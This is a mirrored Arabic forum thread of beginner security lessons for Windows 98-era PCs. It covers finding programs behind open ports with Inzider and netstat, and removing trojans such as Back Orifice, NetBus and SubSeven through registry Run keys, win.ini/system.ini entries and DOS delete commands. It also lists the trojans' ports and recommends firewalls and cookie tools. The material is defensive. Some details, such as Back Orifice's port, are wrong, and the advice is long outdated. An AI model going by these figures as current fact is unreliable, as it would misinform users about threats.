inzider 1.1 - (c) 1999, Arne Vidstrom - http://www.bahnhof.se/~winnt/toolbox/inzider/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.bahnhof.se/%7Ewinnt/toolbox/inzider/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.bahnhof.se/%7Ewinnt/toolbox/inzider/%27)

<!--[if !supportEmptyParas-]>Checked C:WINDOWSEXPLORER.EXE (PID=4294965459).

Checked C:WINDOWSTASKMON.EXE (PID=4294841743).

Checked CROGRAM FILESCISCO SYSTEMSCISCO TFTP SERVERTFTPSERVER.EXE (PID=4294857879).

Found UDP port 69 bound at 0.0.0.0 by CROGRAM FILESCISCO SYSTEMSCISCO TFTP SERVERTFTPSERVER.EXE

(PID=4294857879)

Checked C:WINDOWSSYSTEMMPREXE.EXE (PID=4294953443).

Checked C:WINDOWSSYSTEMKERNEL32.DLL (PID=4294916979).

Checked C:WINDOWSSYSTEMSYSTRAY.EXE (PID=4294845915).

Checked C:MCAFEEVIRUSSCANVSHWIN32.EXE (PID=4294944083).
Checked C:WINDOWSSTARTER.EXE (PID=4294869135


يُلاحظ أن "Inzider" وجد العديد من التطبيقات الفعّالة. PID يرمز إلى ( Process ID ) المستخدم من قبل النظام لتعريف وتمييز التطبيق الفعّال عن غيره من التطبيقات التي تعمل في نفس الوقت.
في الأعلى نجد أن هناك تطبيق واحد تنفيذي وهو TFTPSERVER.EXE والموجود في CROGRAM FILESCISCO SYSTEMSCISCO TFTP SERVER . وقد أظهر البرنامج أن المنفذ الذي يستخدمه هو ( UDP/69 ) وهو منفذ الـ ( TFTP ).
بذلك وجدنا الملف التنفيذي الذي يشغل البورت 69 التابع لـ TFTP، وهو ما أردنا الوصول إليه.
الآن لنا الخيار في إزالة هذا الملف ومنعه من استخدام البورت المخصص له، أو البقاء عليه إن علمنا أننا نريد الخدمة التي يقدمها.
<!--[if !supportEmptyParas-]> <!--[if !supportEmptyParas-]> <!--[endif-]>
التحقق في Windows98:
ويندوز يضم أداة مميزة لمعرفة جميع التطبيقات التي تعمل عند تشغيل النظام. هذه الأداة هي الـ ( System Configuration Utility ) ويمكن الوصول إليها عن طريق C:WindowsSystemMSConfig.exe ، أو من خلال:
قائمة ابدأ Start > تشغيل Run > كتابة Msconfig . .
بعد التشغيل.. ننتقل إلى لسان التبويب ( Startup ) الذي يعرض جميع التطبيقات التي تعمل بمجرد تشغيل النظام. لمنع برنامج من التشغيل ببساطة قم بإزالة علامة التحديد بجانب اسمه، ثم OK. بعد إعادة التشغيل لن يتم تشغيل التطبيق الذي قمت بإزالته.
http://www.7shasha.com/vb/imagehosting/29038464e654e73a20.gif

<!--[if !supportEmptyParas-]> إضافة إلى Startup Tab.. يمكنك عرض ملفات ال config.sys, autoexec.bat, system.ini and win.ini . واتباع نفس الطريقة في إيقاف التطبيقات الغير مرغوبة من التنفيذ. لسان التبويب General يمكنك من عمل نسخة احتياطية للملفات المشار إليها.
أداة أخرى مميزة في الويندوز هي ( Microsoft System Information ).
بعد تشغيلها من خلال نفس خطوات تشغيل وإنما كتابة عند تشغيل Msinfo32 أو اضغط هنا (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://web.fares.net/Program%20Files/Common%20Files/Microsoft%20Shared/MSINFO/MSINFO32.EXE%5Cn%5CnThis%20file%20was%20not%20retr ieved%20by%20Teleport%20Pro,%20because%20it%20is%2 0addressed%20on%20a%20domain%20or%20path%20outside %20the%20boundaries%20set%20for%20its%20Starting%2 0Address.%5Cn%5CnDo%20you%20want%20to%20open%20it% 20from%20the%20server?%27%29%29window.location=%27 http://web.fares.net/Program%20Files/Common%20Files/Microsoft%20Shared/MSINFO/MSINFO32.EXE%27) للوصول إليها مباشرة.. يتم الانتقال إلى Software Enviornment ثم Startup Programs .
http://www.7shasha.com/vb/imagehosting/29038464e654e92aee.gif

<!--[if !supportEmptyParas-]> تقوم هذه الأداة بنفس عمل Msconfig من حيث معرفة التطبيقات التي تعمل عند بداية التشغيل، إنمّا يضاف على ذلك هنا أنه يمكن عرض من أين تمّ تحميل التطبيق ( registry, startup group, autoexec.bat, etc. ).
ويعدّ ذلك مفيداً في تحديد مكان التطبيق المراد إزالته دون البحث عنه.
<!--[if !supportEmptyParas-]> <!--[endif-]>


[U]الـخـلاصـة:
يتم كشف المنافذ المفتوحة عن طريق الأمر netstat -a في الدوس من خلال Start > Programs > Arabic DOS Windows أو غيرها من الطرق المعروفة للانتقال إلى الدوس.
عند تنفيذ الأمر netstat -a لا بدّ وأن تظهر لك العديد من المنافذ إمّا بحالة Listening أو Established .. عندها يجب عليك التمييز بين التطبيقات التي تحتاجها مثلاً كالإكسبلورر والآوتلووك .. الخ. وملاحظة التطبيقات الغريبة خصوصاً إذا ظهر لك رقم IP غير معروف بالنسبة لك.. فهذا يعني أن هناك اتصال بين جهازك وآخر من خلال هذا التطبيق ويجب عليك غلقه وحذفه، إن لم تكن تستخدمه.
http://www.7shasha.com/vb/imagehosting/29038464e654ea9ab1.gifفي المثال السابق.. الوضع الطبيعي إلى حدّ ما يبدو هكذا، حيث أنه لا يوجد أي رقم IP غريب ولا يمكن معرفة مصدره.. وكذلك هناك منفذ ال POP يمكن أن يكون مشغولاً إذا كنت تستخدم الآوتلوك لجلب ، وكذلك الماسينجر، ولا داعي للقلق خوفاً من التجسس في هذه الحالة. أيضاً تلاحظ وجود البروكسي لمزود الخدمة لديك.

لإغلاق المنافذ ( البورتات ) الخطرة لديك.. يجب عليك أولاً: التعرّف على البرنامج الذي يستخدم هذا البورت من خلال برنامج Inzider. ثانياً: تتبع مصدر الخطر ( ملف السيرفر ) وحذفه.

ينصح باستخدام أحد برامج الـ Firewall لحماية الجهاز. التي تعمل على إغلاق جميع المنافذ إلاّ المنافذ التي ترغب باستخدامها فقط كمنفذ POP للبريد أو منفذ الـ FTP .. الخ. وهذه البرامج عديدة ، أشهرها: Norton Internet Securtiy و Zone Alarm .

Linux Root
, Tue, 26 Jun 2007 22:42:41 +0200
الدرس السادس
طرق التخلص من ملفات التجسس

هذه مجموعة من اشهر ملفات التجسس و طرق الخلاص منها ..
Back Oriface

يعمل على فتح المنفذ 3317 لجهازك و يجعل مستخدمي برنامج باك اورفز قادرين على اختراقك .
طريقة التخلص من الملف:
1- من قائمة البداية Start اختر Run و اكتبRegedit
2- من القائمة على اليسار اختر HKEY_LOCAL_MACHINE ثم Software ثم Microsoft ثم Windows ثم Current Virsion ثم Run أو احيانا Run Once.
3- اسم الملف متغيير من مكان لأخر امتداده دائما Exe لكن يمكنك معرفته كون اسم الملف او السرفر تظهر بعده مسافةو من ثم .exe عندما تجد الملف الغه تماما ..


Net Bus - النسخ قبل 2000

هو الاكثر انتشارا على الشبكة .حجمه 470 كيلو بايت
يستخدم المنافذ 12345 و المنافذ 12346و هو يمكن المخترق من السيطرة شبه الكاملة على جهازك .
طريقة التخلص من الملف:
1-اطفأ الجهاز و اعد تشغيلة بهيئة الوضع الآمن او Safe Mode .
2- من الاعلى انتبع الخطوات من1و 2
3- ابحث عن الملف التالي c:\windows\patch.exe و الغه و من ثم اعد تشغيل الجهاز.
للأعلى (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.qatardr.net/showclass.php?classid=18&orderid=3%5Cn%5CnThis%20file%20was%20not%20retriev ed%20by%20Teleport%20Pro,%20because%20it%20is%20ad dressed%20on%20a%20domain%20or%20path%20outside%20 the%20boundaries%20set%20for%20its%20Starting%20Ad dress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20f rom%20the%20server?%27%29%29window.location=%27htt p://www.qatardr.net/showclass.php?classid=18&orderid=3#top%27)
Net Bus 2000

على عكس السابق فاسمه متغيير و حجمة 599 بايت.
طريقة التخلص من الملف:
1- من قائمة البداية Start اختر Run و اكتبRegedit
2- من القائمة على اليسار اختر HKEY_LOCAL_Machine ثم Software ثم Microsoft ثم Windows ثم Current Virsion ثم Run services
3- ابحث في القائمة على اليمين عنNBsvr.exe ( هذا هو اسم الملف في الغالب) هكذا انت على علم ان جهازك مصاب .. و عليك بالعلاج التالي .وحتى و ان لم تجد الملف السابق اكمل الخطوات التالية.
4- انتقل إلى HKEY_LOCAL_USER ثم ابحث عن مجلد اسمه NetBus Server اضغط على المجلد بزر الفأرة الايمن اختر DELETE
5- اختر إعادة تشغيل الجهاز بوضع دوس DOS
5- اكتب Cd Winodw ثم إدخال Enter اتبعها ب CD system و ادخال و من ثم اكتب Del NBSvr.exe و ادخال ، Del NBHelp.dll و اخي Del Log.txt و انتهى . اعد تشغيل جهازك .

Heack’a Tack’a

يستخدم بروتوكل FTP مما يصعب الوصول اليه.يستخدم المنافذ رقم 31785 و 31787 و 31789 و 31791 .
طريقة التخلص من الملف:
1- من قائمة البداية Start اختر Run و اكتبRegedit
2- من القائمة على اليسار اختر HKEY_LOCAL_MACHINE ثم Software ثم Microsoft ثم Windows ثم Current Virsion ثم Run أو احيانا Run
3- ابحث عن Explorer32 و الذي يوافق المسار C:\WINDOWS\Expl32.exe و قم بحذفه
للأعلى (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.qatardr.net/showclass.php?classid=18&orderid=3%5Cn%5CnThis%20file%20was%20not%20retriev ed%20by%20Teleport%20Pro,%20because%20it%20is%20ad dressed%20on%20a%20domain%20or%20path%20outside%20 the%20boundaries%20set%20for%20its%20Starting%20Ad dress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20f rom%20the%20server?%27%29%29window.location=%27htt p://www.qatardr.net/showclass.php?classid=18&orderid=3#top%27)
NetSphere

يستخدم المنافذ TCP 30100 - TCP 30101-TCP 30102
طريقة التخلص من الملف:
1- من قائمة البداية Start اختر Run و اكتبRegedit
2- من القائمة على اليسار اختر HKEY_LOCAL_MACHINE ثم Software ثم Microsoft ثم Windows ثم Current Virsion ثم Run
2-ابحث في الجهه اليمنى عن c:\windows\system\nssx.exe
3- احذف هذا الملف . و اعد تشغيل الجهاز بواسطه الضغط على CTRL+ALT+DELETE.
للأعلى (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.qatardr.net/showclass.php?classid=18&orderid=3%5Cn%5CnThis%20file%20was%20not%20retriev ed%20by%20Teleport%20Pro,%20because%20it%20is%20ad dressed%20on%20a%20domain%20or%20path%20outside%20 the%20boundaries%20set%20for%20its%20Starting%20Ad dress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20f rom%20the%20server?%27%29%29window.location=%27htt p://www.qatardr.net/showclass.php?classid=18&orderid=3#top%27)

مصادر و برامج مفيدة:
Commondon Threat (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.commodon.com/threat/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.commodon.com/threat/%27) معلومات حول انواع كثيرة من ملفات التجسس إذا لم تجد ما تريد في موقعنا يمكنك الاتجاه لهذا الموقع .
The Cleaner (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.moosoft.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.moosoft.com/%27) يقوم بتنظيف جهازك من معظم ملفات التجسس.
Port list (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.simovits.com/nyheter9902.html%5Cn%5CnThis%20file%20was%20not%20 retrieved%20by%20Teleport%20Pro,%20because%20it%20 is%20addressed%20on%20a%20domain%20or%20path%20out side%20the%20boundaries%20set%20for%20its%20Starti ng%20Address.%5Cn%5CnDo%20you%20want%20to%20open%2 0it%20from%20the%20server?%27%29%29window.location =%27http://www.simovits.com/nyheter9902.html%27) قائمة بالمنافذ المستخدمة من قبل ملفات التجسس
BOClean (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.nsclean.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.nsclean.com/%27) ينظف جهازك من Back Oriface و انواع اخرى

Linux Root
, Tue, 26 Jun 2007 22:44:47 +0200
الدرس السابع
طريقة حذف الباتش من الجهاز


هذا الملف ظهوره كان يعتبر حلم للهاكرز فهاذا الملف السحري به يستطيع الهاكر أن يحصل على سيطرة كاملة بالجهاز المصاب بهذا الملف . فمنة يستطيع تغيير أو حذف أو حتى اضافة ملفات للجهاز . و منة يستطيع أن يتحكم بالأجهزة الموجودة كفتح السي دي روم أو حتى فصل بطاقة الصوت من الجهاز

كيفية حذف الملف ؟

طريقة حذف الملف سهلة جدا

1- في قائمة البداية اختر الأمر RUN


2- اكتب هذه الكلمة في المكان المتاح REGEDIT




3- من القائمة اختر HKEY-LOCAL-MACHINE



4- بعد ذلك اختر Software





5- ثم Microsoft





6- بعد ذلك Windows





7- ثم Current Version





8- و أخيرا Run





9- في القائمة على اليسار راجع الملفات الموجودة و ابحث عن ملف PATCH.EXE أو أي ملف استقبلته و لم يعمل و احذفه ثم اعد تشغيل الجهاز

Linux Root
, Tue, 26 Jun 2007 22:45:24 +0200
الدرس الثامن
كيف تتخلص من القنبلة Sub seven

أخطر برامج الإختراق يسمى في منطقة الخليج ( الباكدور جي ) ويطلق عليه البعض إسم القنبلة تتركز خطورته في أنه يتميز بمخادعة الشخص الذي يحاول إزالته فهو يعيد تركيب نفسه تلقائيا بعد حذفه يعتبر أقوى برنامج إختراق للأجهزة الشخصية وفي إصدارته الأخيرة يمكنه أن يخترق سيرفر لقنوات المحادثة Mirc كما يمكنه إخترق أي جهاز أي شخص بمجرد معرفة إسمه في ICQ




أخطر برامج الإختراق يسمى في منطقة الخليج ( الباكدور جي ) ويطلق عليه البعض إسم القنبلة تتركز خطورته في أنه يتميز بمخادعة الشخص الذي يحاول إزالته فهو يعيد تركيب نفسه تلقائيا بعد حذفهيعتبر أقوى برنامج إختراق للأجهزة الشخصية .. وفي إصدارته الأخيرة يمكنه أن يخترق سيرفر لقنوات المحادثة Mirc كما يمكنه إخترق أي جهاز أي شخص بمجرد معرفة إسمه في ICQ كما يمكنه إختراقمزودات البريد smtp/pop3 يعتبر الإختراق به صعب نسبيا وذلك لعدم إنتشار ملف التجسس الخاص به في أجهزة المستخدمين الا أنه قائما حاليا على الإنتشار بصورة مذهلة ويتوقع أنه بحلول منتصف عام 2001 سوف تكون نسبة الأجهزة المصابة بملف السيرفر الخاص به 40-55 % من مستخدمي الإنترنت حول العالم وهذه نسبة مخيفة جدا إذا تحققت فعلا ... مميزاته خطيرة للغاية فهو يمكن المخترق من السيطرة الكاملة على الجهاز وكأنه جالس على الجهاز الخاص به حيث يحتوي على أوامر كثيرة تمكنه من السيطرة عليه ... بل يستطيع أحيانا الحصول على أشياء لا يستطيع مستخدم الجهاز نفسه الحصول عليها مثل كلمات المرور .. فالمخترق من هذا البرنامج يستطيع الحصول على جميع كلمات المرور التي يستخدمها صاحب الجهاز !!! ولخطورته الكبيرة فسوف نفصل في الشرح عنه

http://www.7shasha.com/vb/imagehosting/29038464e69e089885.gif
أعـراض الإصابة :
من أهم أعراض الإصابة بهذا البرنامج ظهور رسالة " قام هذا البرنامج بأداء عملية غير شرعية ... " وتظهر هذه الرسالة عند ترك الكمبيوتر بدون تحريك الماوس أو النقر على لىحة المفاتيح حيث يقوم البرنامج بعمل تغييرات في حافظة الشاشة وتظهر هذه الرسائل عادة عندما تقوم بإزالة إدخالات البرنامج في ملف system.ini كما أن بإمكان الخادم إعادة إنشاء نفسه بعد حذفه من الويندوز بإستخدام بعض الملفات المساعدة له في ذلك
خطورة البرنامج :
يمكن عمل تعديلات على الخادم الخاص بالبرنامج من خلال برنامج التحرير الخاص به لذلك فإنه من الواجب البحث في أي مكان ممكن أن يسجل فيه ليعمل تلقائيا يعني أي مكان يمكن وضع أوامر للويندوز ليقوم بتشغيله تلقائيا .
التخلص منه :
1- إفتح الملف win.ini الموجود في مجلد الويندوز وابحث في بداية السطور الأولى من هذاالملف عن أي قيك شبيهة بالقيم التـالية :
run=xxxx.exe أو run = xxxx.dll أو Load=xxxx.exe أو Load = xxxx.dll
لاحظ أن xxxx تعني إسم الخادم وإذا عثرت على أي قيمة منها فقم بحذفها
2- افتح الملف system.ini الموجود في مجلد الويندوز وفي السطر الخامس ستجد السطر التالي :
shell = Explorer.exe ... فإذا كان جهازك مصابا ستجد السطر على هذا الشكل :
shell=Explorer.exe xxxx.exe .... أو shell = Explorer.exe xxxx.dll
مع العلم بأن xxxx هو إسم الخادم الذي من أشهر أسمائه rundll16.exe و Task_Bar.exe فإذا كان كذلك فقم بمسح إسم الخادم فقط ليصبح السطر : shell = Explorer.exe
3- إضغط على start ثم تشغيل ثم إكتب regedit لتدخل الى
ملف السجل ثم قم بالدخول تسلسليا على الأتي :
HKEY_LOCAL_MACHINE
Software
Microsoft
Windows
Current Version
داخل المجلد Run إبحث عن إسم الخادم الذي عثرت عليه في مــلف system.ini أو الملف win.ini ( في بعض الأحيان قد يتغير إسم الخادم في ملف التسجيل لذلك إبحث عن أي شي غريب ) ثم بعد ذلك توجه لمجلد الويندوز وستجد أن حجم الخادم الذي عثرت عليه في ملف التسجيل حوالي 328 كيلو بايت إذا كان كذلك عد لنفس المنطقة في ملف التسجيل وقم بحذف القيمة وذلك بالنقر على إسمها وإختيار حذف delete الآن أعد تشغيل الجهاز ثم توجه لمجلد الويندوز وقم بحذف الخادم بالنقر عليه بالزر الأيمن للماوس وإختيار حذف

Linux Root
, Tue, 26 Jun 2007 22:46:54 +0200
الدرس التاسع

التخلص من الإعلانات والكعكات (Cookies) والمخترقين

سنحاول اليوم استعراض بعض البرامج التي توفر الحماية أينما كنت على شبكة الإنترنت، وكذلك بعض البرامج التي تقفل جهازك وتقوم بتشفير البيانات التي تبعث بها بحيث لا يعترضها أحد أو لا تقع في يد حتى أقرب الموظفين إليك في مجال العمل· وسواء أردنا ذلك أو لم نرده، فان الإبحار على شبكة الإنترنت يجعلنا عرضة للقراصنة والمخترقين، والمتطفلين، وغيرهم·

* إلغاء الإعلانات
صحيح أن الإعلانات التي تقفز أمامك على الشاشة كلما تنقلت من صفحة الى أخرى ليست مضرة وهي في بعض الأحيان الثمن الذي تدفعه مقابل الاستفادة من المواقع التي تتصفحها، ولكنك تستطيع أن تزيل الإعلانات من كمبيوترك إذا استخدمت البرنامج التالي المجاني OptOut الذي تستدعيه من موقع الشركة http://grc.com/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://grc.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://grc.com/%27) على الإنترنت، وبالذات من الصفحة http://grc.com/optout.htm (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://grc.com/optout.htm%5Cn%5CnThis%20file%20was%20not%20retrie ved%20by%20Teleport%20Pro,%20because%20it%20is%20a ddressed%20on%20a%20domain%20or%20path%20outside%2 0the%20boundaries%20set%20for%20its%20Starting%20A ddress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20 from%20the%20server?%27%29%29window.location=%27ht tp://grc.com/optout.htm%27) فهذا البرنامج يزيل حتى بقايا الاعلانات التي تعلق في الكمبيوتر·
وهناك برنامج آخر أقوى منه هو ad-Aware وهو برنامج مجاني تستطيع استدعاءه من موقع الشركة http://www.lavasoft.de/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.lavasoft.de/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.lavasoft.de/%27)
الوقاية من القراصنة
ربما كانت الطريقة المثلى للوقاية من المخترقين والقراصنة على الإنترنت وخصوصا إذا كان أحدنا يستخدم الخط الرقمي أو ADSL السريع، في استخدام جدران النار الشخصية·
ويعد البرنامج Tiny Personal Firewall من البرامج الناجحة في هذا الخصوص، وتستطيع استدعاءه من موقع الشركة Tiny Software على العنوان www.tinysoftware.com/index.php (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.tinysoftware.com/index.php%5Cn%5CnThis%20file%20was%20not%20retriev ed%20by%20Teleport%20Pro,%20because%20it%20is%20ad dressed%20on%20a%20domain%20or%20path%20outside%20 the%20boundaries%20set%20for%20its%20Starting%20Ad dress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20f rom%20the%20server?%27%29%29window.location=%27htt p://www.tinysoftware.com/index.php%27) فهو يوفر ثلاثة مستويات من الوقاية ويجعلك توصف الأمان حسبما تريد وهناك أيضا البرنامج Termi-Net وتجده على العنوان http://www.danu.ie/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.danu.ie/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.danu.ie/%27) وهو جدار ناري وتستطيع ان توصف مستويات الأمن المناسبة لك والتي تعمل بطريقة تلقائية·
من جهة أخرى، فانك تحتاج في كل مرة تريد مراجعة بريدك الالكتروني الى كلمة مرور Password وبدونه لا تستطيع أن تحصل على رسائلك الالكترونية، وكذلك الحال كلما أردت شراء بعض السلع والخدمات عبر الانترنت·
ان ذلك يعرضك لمخاطر القراصنة الذين قد يسرقون رقم بطاقة الائتمان الشخصية الخاصة بك لاستخدامها، ولهذا السبب، تستطيع بقليل من العناية أن تحافظ على السرية والأمان في هذه الأحوال كلها·
إليك بالبرنامج Password 0002 وتجده على عنوان الشركة http://www.mightsoft.com/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.mightsoft.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.mightsoft.com/%27) فهو يقوم باختزان وحفظ كلمات المرور الخاصة بك كما يقوم بتشفيرها بحيث لا يستطيع أحد فهمها، كما يمكن للبرنامج أن يعد كلمات مرور خاصة بك·
الوقاية من الكعكات Cookies
الكعكات Cookies كما نعرف جميعا عبارة عن ملفات لبرامج صغيرة للغاية ترسلها الى كمبيوترك شركات ما أثناء زيارتك لمواقعها على الانترنت، ومن المعروف أن هذه الكعكات تلتصق بالكمبيوتر وتبدأ بارسال معلومات الى الشركات المعنية تبين فيها طريقتك في الابحار على الانترنت، واسلوبك في التعامل مع المواقع، وتهدف من وراء ذلك الى تطوير خدماتها بحيث تلبي رغباتك ورغبات الآخرين، ولكن كثيرا من المبحرين لا يحبذون ذلك وخصوصا ان بعض أنواع الكعكات تتابع كل صفحة من صفحات الوب التي تزورها·
وهناك برنامج تستطيع بواسطته التخلص من الكعكات وهو Zeroclick وتستطيع استدعاءه مجانا من عنوان الشركة www.davecentral.com/86321.html (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.davecentral.com/86321.html%5Cn%5CnThis%20file%20was%20not%20retrie ved%20by%20Teleport%20Pro,%20because%20it%20is%20a ddressed%20on%20a%20domain%20or%20path%20outside%2 0the%20boundaries%20set%20for%20its%20Starting%20A ddress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20 from%20the%20server?%27%29%29window.location=%27ht tp://www.davecentral.com/86321.html%27) وهو يمنع أي نوع من الكعكات من الالتصاق بجهازك·
وهناك برامج تخيرك بين قبول هذه الكعكات أو رفضها منها البرنامج Cookie Pal وتجده على عنوان الشركة http://www.kburra.com/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.kburra.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.kburra.com/%27) أو البرنامج (شرطي الكعكات) Cookie Cop وتجده على عنوان الشركة www.pacificnet.net/~bbruce/cookycop.htm (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.pacificnet.net/%7Ebbruce/cookycop.htm%5Cn%5CnThis%20file%20was%20not%20retr ieved%20by%20Teleport%20Pro,%20because%20it%20is%2 0addressed%20on%20a%20domain%20or%20path%20outside %20the%20boundaries%20set%20for%20its%20Starting%2 0Address.%5Cn%5CnDo%20you%20want%20to%20open%20it% 20from%20the%20server?%27%29%29window.location=%27 http://www.pacificnet.net/%7Ebbruce/cookycop.htm%27)
كيف تقفل جهازك؟
الحفاظ على السرية لا يقتصر فحسب على ابحارك على شبكة الانترنت، بل يشمل أيضا أولئك الأشخاص الذين يستخدمون جهازك في غيابك، ولذلك تحتاج الى برنامج يقفله ويقوم بتشفير كافة البيانات الموجودة فيه·
ان البرنامج Freezer خير من يقوم بالمهمة وتجده على عنوان الشركة http://www.talyasoft.com/ (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.talyasoft.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.talyasoft.com/%27) وهو يستخدم مستويات مختلفة من التعقيد لمنع أي شخص من دخول جهازك أو حتى استخدام أي وظيفة منه، كما يمنعه من استخدام كلمة المرور الخاصة بك· البرنامج ثمنه 25 دولارا ولكنك تستطيع تجربته لمدة شهر. وهناك أيضا البرنامج SecureIt Pro وتجده على عنوان الشركة www.go.to/quantrix (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.go.to/quantrix%5Cn%5CnThis%20file%20was%20not%20retrieve d%20by%20Teleport%20Pro,%20because%20it%20is%20add ressed%20on%20a%20domain%20or%20path%20outside%20t he%20boundaries%20set%20for%20its%20Starting%20Add ress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20fr om%20the%20server?%27%29%29window.location=%27http ://www.go.to/quantrix%27)أما اذا لم ترد اغلاق جهازك وتريد أن تعرف كيف يستخدمه الآخرون في غيابك، اليك هذا البرنامج Desktop Dectective وتجده على عنوان الشركة www.davecentral.com/84321.html (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.davecentral.com/84321.html%5Cn%5CnThis%20file%20was%20not%20retrie ved%20by%20Teleport%20Pro,%20because%20it%20is%20a ddressed%20on%20a%20domain%20or%20path%20outside%2 0the%20boundaries%20set%20for%20its%20Starting%20A ddress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20 from%20the%20server?%27%29%29window.location=%27ht tp://www.davecentral.com/84321.html%27)

Linux Root
, Tue, 26 Jun 2007 22:49:50 +0200
الدرس العاشر
الحماية على الشبكة
هل أنت بحاجة للحماية ؟


في الحقيقة هذا الموضوع شغل العالم باكمله .. فحتى اكبر الشركات و اكثرها تطورا عانت من هذه المشكلة خذ مثلا شركة اتصالات الإمارات . لا ضمان مع تطور العلم و لا يوجد ثوابت تمنع احتمالية اختراق جهازك و لكن يوجد عوامل مقلله ..
بمجرد دخولك للشبكة العالمية فلا تعتقد انك وحدك .. فهناك آلاف العيون تتلصص عليك .. بقصد او بدون قصد و ليست كل العيون ضارة و لا تعتقد ان تجولك في الشبكة باسم مستعار و بريد الكتروني مجاني يجعلك في مأمن و تستطيع ان تقوم بما تريد وقتما تريد .. عذرا انت مخطأ؟ العيون الخفية التي تحدثنا عنها سابقة تراقبك و بدقة شديدة..هل انت متلهف لمعرفة تلك العيون المخفية انها مزودات الخدمة ..!!!(ISP) او الشركة التي تمنحك خدمة الإتصال بالأنترنت. و المواقع التي تزورها فمزود الخدمات يملك سيطره كاملة عليك و على بياناتك اما المواقع فتاخذ من جهازك ما تشاء .

يمكن لمزودي الخدمات معرفة الكثير كون اتصالك يمر من خلالهم..و خاصة إذا مر اتصالك عن طريق بروكسي.. كل ما يمكن ان يخطر ببالك و لكن لحسن الحظ فهذه البيانات تجمع لأسباب امنية و لا تفتح في العادة إلا في حالات الحوادث
